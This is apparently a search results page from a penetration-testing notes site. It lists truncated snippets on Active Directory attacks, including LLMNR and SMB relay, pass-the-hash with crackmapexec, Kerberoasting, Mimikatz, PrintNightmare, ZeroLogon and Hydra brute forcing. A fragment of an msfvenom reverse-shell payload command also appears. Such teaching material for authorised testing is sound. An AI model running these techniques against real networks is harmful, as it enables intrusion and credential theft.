Search Results

Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local Area Network (LAN), this attack method cannot be performed from a different subnet. The attacker would have to compromise a host on the LAN and upload tools, or p...

Note: Network Environment This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...

Note: Network Environment This spoofing attack and works by sending a router announcement to multicast ff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announ...

What's the Flaw? Usually involves an unsecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...

Overview A set of PowerShell functions that can be used to enumerate ActiveDirectory. Part of the larger PowerSploit Framework Usage Transfer PowerView.ps1 to the compromised target. Requires a PowerShell session. Then, source the file into the current se...

1. Installation sudo apt install -y neo4j bloodhound 2. Setup sudo neo4j console & Navigate to http://localhost:7474 Login is neo4j and change the default password sudo bloodhound & Log into the neo4j user account with the new password 3. Data...

net.exe Drawbacks net does not show nested groups net only shows up to 10 groups even if a user is in more Local System net user – Enumerate system local users net user user.name – Get information about a specific local user net localgroup – Enume...

Overview Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Attack 1: crackmapexec sudo crackmapexec smb <target-or...

Overview Dumped the SAM or LSA and now have hashes for domain or a local users. Use the hash and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential Anatomy of a Windows Hash username:SID:LM_HASH:NT...

Overview Tokens are temporary keys that allow a user to perform actions on a system or network without having to provide a password; similar to session cookies on a web site. The tokens are generated once a user logs onto a system or RDP session. They remain ...

Overview The attacker uses a known username and password of a user on a domain. A typical Kerberos workflow is: Once a user logs into a domain-joined system, they get a TGT (ticket-granting ticket). Then, they'll use that TGT to request a TGS (ticket-gra...

Overview GPP allows admins to create policies with embedded credentials. The credentials are encrypted and stored in a cPassword. The key was accidentally released. What's the Flaw? The MS14-025 patch does not apply to GPP passwords embedded prior to the ...

Local Privilege Escalation https://github.com/calebstewart/CVE-2021-1675

Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell.   Create payload msfvenom -p <payload> LHOST=<kali-i...

Overview https://github.com/gentilkiwi/mimikatz There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimkatz is primarily used to dump hashes from  LSASS, pass hashes, or generating Kerberos tickets for use in attacks.     ...

Caution This can potentially break a domain controller, due the fact that this attack temporarily removes the password from a domain controller. After testing this attack, the original password should be restored. ZeroLogon Checker https://github.com/Secu...

Example from Vulnhub https://www.vulnhub.com/entry/prime-1,358/ In this challenge, a script outputs an AES-256 encrypted file and a hint in key.txt The hint says to hash the word "ippsec" with the MD5 algorithm This is the key to decrypt the hash Hash Base 6...

Brute Force with a Request File Start Burp Make a randomized login to the target web page Copy the output, for example: POST /login HTTP/1.1 Host: 10.10.10.10 Content-Length: 37 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT ...

Understanding Hydra Help Viewing Hydra Modules Print the hydra help output hydra -h Notice the Supported services section. These are the modules that the hydra binary installed on your system can use. Supported services: adam6500 asterisk cisco cisco-enab...

Example 1: Nmap script scan with categories Categories https://nmap.org/book/nse-usage.html#nse-categories auth broadcast brute default discovery dos exploit external fuzzer intrusive malware safe version vuln # Scan UDP/161 with all snmp-* scripts # Do ...